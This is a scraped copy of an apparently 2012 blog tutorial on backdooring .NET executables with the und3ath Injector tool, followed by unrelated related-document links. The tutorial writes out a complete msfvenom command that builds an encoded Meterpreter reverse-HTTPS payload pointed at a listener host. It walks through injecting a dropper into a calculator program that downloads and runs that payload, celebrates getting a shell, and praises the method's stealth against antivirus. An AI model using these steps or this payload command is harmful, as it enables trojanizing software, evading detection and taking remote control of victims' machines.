prev
next
out of 7

Injec Arbitary Code

Embed Size (px)

Citation preview

  • 7/28/2019 Injec Arbitary Code

    1/7

    Injecting arbritary code into .NET Assemblies

    using und3ath InjectorPosted on by infodox

    Last night I was browsing a forum I frequent http://trojanforge.com/ and came across a piece of codenamed und3ath Injector written by a user named und3ath. It claimed to be capable of injecting

    arbritary code into .NET assemblies without harming the original code in short a stealth

    backdooring tool for .NET executables.

    The authors article and release can be found on his blog here:http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.html this guy is a very good

    .NET programmer, I expect he will come out with more awesome things soon

    This, to me, was fascinating. What it does is it directly injects evil code into the .net executable into

    one of the functions or forms that comprise the assembly, without altering the functionality of theoriginal. It simply sneakily adds a Little Extra. The fact I fucking hate .NET with a passion meant I

    saw a hilarious extra Evil side to this! A trojanizer for .NET executables? AWESOME. I had troublein the past injecting MSF payloads into .NET binaries without breaking the original binary.

    The proof of concept tool und3ath Injector has two payloads. A Messagebox payload and a TrojanDownloader payload. The first is proof the damn thing works, the second a more weaponized

    payload for dropping malware or backdoors on a victim system.

    One of the benefits of using a downloader instead of hiding a full backdoor in there is stealth less

    modifications to the file, and less for an AV to sign on.

    So, without further ado, I am going to inject a dropper into a .NET binary, and see does it function as

    planned. The dropper will download a Meterpreter payload from a remote server, execute the payload,

    and we will take it from there

    Before we do anything, we will generate our Metasploit Payload to run on the victim system and placein our webroot.

    The following should do the trick

    msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 25

    LHOST=192.168.1.41 LPORT=443 >evil.exe

    This creates the executable file evil.exe in our current working directory. The msfvenom command

    should be self explanatory, but if there is demand for it I will write an article later on using msfvenom.If you are capable of reading the f*cking manual you should get it

    http://insecurety.net/?author=1http://trojanforge.com/http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.htmlhttp://trojanforge.com/http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.htmlhttp://insecurety.net/?author=1

  • 7/28/2019 Injec Arbitary Code

    2/7

    Creating the Meterpreter payload

    So we have our evil binary in /var/www/lulz ready to go. We can now move on to the main part of thisarticle backdooring .NET assemblies by patching them with extra .NET code.

    The victim .NET binary I chose to use is a simple calculator application. I found it online and decidedit made a good enough victim for demonstration purposes.

    Here is a screenshot of it running, for those of you who do not know what a calculator is

    http://insecurety.net/wordpress/wp-content/uploads/2012/11/infodox@yore-ma-_009.png

  • 7/28/2019 Injec Arbitary Code

    3/7

    .NET calculator

    Now. We open und3ath Injector and select Load File. Use this dialogue to select the binary youwish to backdoor.

    http://insecurety.net/wordpress/wp-content/uploads/2012/11/calculator.png

  • 7/28/2019 Injec Arbitary Code

    4/7

    Selecting a file to backdoor

    Next we click on any of the parts that we think would be good to inject code into (I normally choosethe main class for some odd reason, though you could select an on click event)

    When we click on this the Payloader menu comes up. We insert our information/selection here.

    http://insecurety.net/wordpress/wp-content/uploads/2012/11/Load_File.png

  • 7/28/2019 Injec Arbitary Code

    5/7

    Create the Payload

    When you click inject, it starts creating a new binary for you to use and you save it.

    http://insecurety.net/wordpress/wp-content/uploads/2012/11/CreatePayload.png

  • 7/28/2019 Injec Arbitary Code

    6/7

    Saving the Backdoor

    Now, we have our evil binary ready to deploy, and have our Metasploit listener ready. We run the

    modified binary on the victim host and haz shell

    http://insecurety.net/wordpress/wp-content/uploads/2012/11/save_backdoor.png

  • 7/28/2019 Injec Arbitary Code

    7/7

    Got a shell =D

    So, as you an see, it is relatively trivial to inject arbritary code into a .NET assembly without affectingthe existing functionality of the software.

    http://insecurety.net/wordpress/wp-content/uploads/2012/11/infodox@yore-ma-_010.png

Advisor: Dan Marchesin IMPA Co-advisor: Johannes Bruining ... · Helmut Wahanik Advisor: Dan Marchesin IMPA Co-advisor: Johannes Bruining TUDelft Efeitos termicos na injec¸´ ao

Advisor: Dan Marchesin IMPA Co-advisor: Johannes Bruining ... · Helmut Wahanik Advisor: Dan Marchesin IMPA Co-advisor: Johannes Bruining TUDelft Efeitos termicos na injec¸´ ao

Documents
S Form Approved REPORT DOCUMENTATION PAGE -T · PDF fileS Form Approved REPORT DOCUMENTATION PAGE -T oM8 No 0704-0o18 ... position of each atom is defined relative to some arbitary

S Form Approved REPORT DOCUMENTATION PAGE -T · PDF fileS Form Approved REPORT DOCUMENTATION PAGE -T oM8 No 0704-0o18 ... position of each atom is defined relative to some arbitary

Documents
mastertechmag.commastertechmag.com/pdf/1992/09sep/199209IS_MazdaRX7Turbo.pdf · If you like Rubik's Cube, you'll love the fuel injec- ted turbo version ofthe 13B rotary. The addition

mastertechmag.commastertechmag.com/pdf/1992/09sep/199209IS_MazdaRX7Turbo.pdf · If you like Rubik's Cube, you'll love the fuel injec- ted turbo version ofthe 13B rotary. The addition

Documents
Intravitreal injection of polysorbate 80: a functional and ... · Intravitreal injec-tion of drugs overcomes external blood-retinal barrier and assures that retina and choroid receive

Intravitreal injection of polysorbate 80: a functional and ... · Intravitreal injec-tion of drugs overcomes external blood-retinal barrier and assures that retina and choroid receive

Documents
Arbitary Types

Arbitary Types

Documents
Sonsored by uantel Medical SubLiminal Laser for Center-Involving … · SubLiminal laser can reduce, or eliminate, the use of intravitreal injec-tions and associated risks, costs,

Sonsored by uantel Medical SubLiminal Laser for Center-Involving … · SubLiminal laser can reduce, or eliminate, the use of intravitreal injec-tions and associated risks, costs,

Documents
WATERSTOP INJECTION SYSTEMS - SealBoss Concrete … POLYURETHANE INJEC… ·  · 2017-06-23SealBo CorpSA inoealoco ph intl SealBoss ® Waterstop Injection Systems Waterstop

WATERSTOP INJECTION SYSTEMS - SealBoss Concrete … POLYURETHANE INJEC… ·  · 2017-06-23SealBo CorpSA inoealoco ph intl SealBoss ® Waterstop Injection Systems Waterstop

Documents
NUMERICAL SIMULATION OF MAGNETRON INJEC- TION GUN FOR 1 MW 120 GHz GYROTRON

NUMERICAL SIMULATION OF MAGNETRON INJEC- TION GUN FOR 1 MW 120 GHz GYROTRON

Documents
LOGIC ANALYSER, ARBITARY WAVE GENERATOR AND WAVE ANALYSER

LOGIC ANALYSER, ARBITARY WAVE GENERATOR AND WAVE ANALYSER

Devices & Hardware
Catalog de produse...Hidroizolatii PREDIMAX® 11 Sistem de injectie Furtun pentru injec ii multiple utilizat la hidroizolarea eficient a rosturilor de lucru din beton Furtun de injec

Catalog de produse...Hidroizolatii PREDIMAX® 11 Sistem de injectie Furtun pentru injec ii multiple utilizat la hidroizolarea eficient a rosturilor de lucru din beton Furtun de injec

Documents
ChronOS Injec

ChronOS Injec

Documents
IMPLEMENTATION OF THE ARBITARY LAGRANGIAN EULERIAN …m120.emship.eu/Documents/MasterThesis/2019/MARQUEZ Lucas.pdf · 2019. 3. 18. · Tostudy numerically the impact of a. soft body

IMPLEMENTATION OF THE ARBITARY LAGRANGIAN EULERIAN …m120.emship.eu/Documents/MasterThesis/2019/MARQUEZ Lucas.pdf · 2019. 3. 18. · Tostudy numerically the impact of a. soft body

Documents
NUMERICAL INVESTIGATION OF NATURAL GAS DIRECT … · 1800 cm3 MPFI gasoline engine to direct injec-tion NGengine with minimummodifications. In this regard an extensive numerical modeling

NUMERICAL INVESTIGATION OF NATURAL GAS DIRECT … · 1800 cm3 MPFI gasoline engine to direct injec-tion NGengine with minimummodifications. In this regard an extensive numerical modeling

Documents
Bosch eXchange: Eficient, u or, rapidpartscat.autoadria.ro/public/images/upload/files/conditii_specifice_bosch.pdfspeciale _i cele mai recente serii de autoutilitare. Sisteme de injec

Bosch eXchange: Eficient, u or, rapidpartscat.autoadria.ro/public/images/upload/files/conditii_specifice_bosch.pdfspeciale _i cele mai recente serii de autoutilitare. Sisteme de injec

Documents
Plastic Injec. Lab

Plastic Injec. Lab

Documents
Direct Growth of Graphene Film on Germanium Substrate · 2014. 8. 6. · graphene growth on arbitary surfaces, especially on semiconductor materials in order to promote better com-patibility

Direct Growth of Graphene Film on Germanium Substrate · 2014. 8. 6. · graphene growth on arbitary surfaces, especially on semiconductor materials in order to promote better com-patibility

Documents
· PDF filethe design points, and is, for each i, a non-linear functional of 9. = t) dt. The design space, (the space containing the Xi's,) may be quite arbitary

· PDF filethe design points, and is, for each i, a non-linear functional of 9. = t) dt. The design space, (the space containing the Xi's,) may be quite arbitary

Documents
Injec&ng(evil(code(in(your(SAP(J2EE(systems:( Security(of ... · Business!applicaon! security!expert Yetanother!security! researcher! erpscan.com ERPScan—investinsecuritytosecureinvestments

Injec&ng(evil(code(in(your(SAP(J2EE(systems:( Security(of ... · Business!applicaon! security!expert Yetanother!security! researcher! erpscan.com ERPScan—investinsecuritytosecureinvestments

Documents
EFFECTS ON THE CARDIOVASCULAR SYSTEM OF FLUIDS … · EFFECT OF INTRAVENOUS FLUIDS ON CARDIOVASCULAR SYSTEM Venouspressure The venous pressure was normal before injec-tion of fluid

EFFECTS ON THE CARDIOVASCULAR SYSTEM OF FLUIDS … · EFFECT OF INTRAVENOUS FLUIDS ON CARDIOVASCULAR SYSTEM Venouspressure The venous pressure was normal before injec-tion of fluid

Documents
INDEX [jpet.aspetjournals.org]jpet.aspetjournals.org/content/jpet/208/3/local/back... · 2005-12-22 · 528 Index Bradykinin, intra-arterial injec-tioninrabbit hindlimb, car-diovascular

INDEX [jpet.aspetjournals.org]jpet.aspetjournals.org/content/jpet/208/3/local/back... · 2005-12-22 · 528 Index Bradykinin, intra-arterial injec-tioninrabbit hindlimb, car-diovascular

Documents
Keysight M8190A Arbitary Waveform Generator

Keysight M8190A Arbitary Waveform Generator

Documents
- Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

- Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability

Documents
Injec&ng(evil(code(in(your(SAP(J2EE(systems:( Security… · Business!applicaon! security!expert Yetanother!security! researcher! erpscan.com ERPScan—investinsecuritytosecureinvestments

Injec&ng(evil(code(in(your(SAP(J2EE(systems:( Security… · Business!applicaon! security!expert Yetanother!security! researcher! erpscan.com ERPScan—investinsecuritytosecureinvestments

Documents
SIGLA ET IDENTIFICATION · Plun. and deliv. valve for injec. pump type 6LD360, 6LD360N, 6LD400 and 6LD400/V Plunger and deliv. valve for GDV for injec. pump type 6LD401/B1, 6LD435/B1

SIGLA ET IDENTIFICATION · Plun. and deliv. valve for injec. pump type 6LD360, 6LD360N, 6LD400 and 6LD400/V Plunger and deliv. valve for GDV for injec. pump type 6LD401/B1, 6LD435/B1

Documents
injec- - bmj.com · to its emetic and its expectorant properties, invarious throat and chest affections. Mlany American writers consider that

injec- - bmj.com · to its emetic and its expectorant properties, invarious throat and chest affections. Mlany American writers consider that

Documents
CT SEC INJEC

CT SEC INJEC

Documents
€¦ · Mahindra & Mahindra Scorpio Daimler Toyota Innova Corolla ange Ford Ikon Flßion Accord Bolero Civic Produc Wiring Harness High Tension Corck Injec*ion Plastic ... Soft—re

€¦ · Mahindra & Mahindra Scorpio Daimler Toyota Innova Corolla ange Ford Ikon Flßion Accord Bolero Civic Produc Wiring Harness High Tension Corck Injec*ion Plastic ... Soft—re

Documents
RESEARCH SUMMARY - uni-hamburg.de · classes [15, 16] – differential trivializations of arbitary universal characteristic classes. We re-cover the canonical 3-forms [13] that are

RESEARCH SUMMARY - uni-hamburg.de · classes [15, 16] – differential trivializations of arbitary universal characteristic classes. We re-cover the canonical 3-forms [13] that are

Documents
Genomics of Chloroplasts and Difference Gel ... · Resonance Mass Spectrometry (FT-ICR-MS) for Plant Metabolite Profiling and Metabolite Identification.-Combined NMR and Flow Injec-tion

Genomics of Chloroplasts and Difference Gel ... · Resonance Mass Spectrometry (FT-ICR-MS) for Plant Metabolite Profiling and Metabolite Identification.-Combined NMR and Flow Injec-tion

Documents
Agilent M8190A Arbitary Waveform Generator - Keysight · Contents M8190A User’s Guide 5 Contents Contents ..... 5

Agilent M8190A Arbitary Waveform Generator - Keysight · Contents M8190A User’s Guide 5 Contents Contents ..... 5

Documents